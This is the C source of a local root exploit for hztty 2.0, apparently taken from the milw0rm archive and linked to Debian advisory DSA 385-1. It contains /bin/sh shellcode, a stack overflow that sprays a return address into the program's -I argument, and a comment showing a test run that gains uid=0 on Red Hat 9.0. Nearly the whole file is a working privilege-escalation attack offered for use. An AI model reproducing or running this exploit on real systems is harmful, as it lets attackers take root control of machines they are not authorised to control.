/* 0x333hztty => hztty 2.0 local root exploit
*
*
* more info : Debian Security Advisory DSA 385-1
*
* *note* I adjusted some part of hztty's code since
* there were some errors. hope this will not influence
* exploitation :> tested against Red Hat 9.0 :
*
* [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
* [c0wboy@0x333 c0wboy]$ ./k
*
* --- local root exploit for hztty 2.0 ---
* --- coded by c0wboy ~ 0x33 ---
*
* sh-2.05b# [./hztty started] [using /dev/ttyp6]
* sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
* sh-2.05b#
*
* coded by c0wboy
*
* (c) 0x333 Outsiders Security Labs
*
*/
#include <stdio.h>
#include <unistd.h>
#define BIN "./hztty"
#define SIZE 272
unsigned char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
"\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
"\xd2\xb0\x0b\xcd\x80" ;
int main()
{
int i;
char out[SIZE];
char *own[] = { shellcode, 0x0 };
int *hztty = (int *)(out);
int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);
for (i=0 ; i<SIZE-1 ; i+=4)
*hztty++ = ret;
hztty = 0x0;
fprintf (stdout, "\n --- local root exploit for hztty 2.0 ---\n");
fprintf (stdout, " --- coded by c0wboy ~ www.0x333.org ---\n\n");
execle (BIN, BIN, "-I", out, 0x0, own, 0x0);
}
// milw0rm.com [2003-09-21]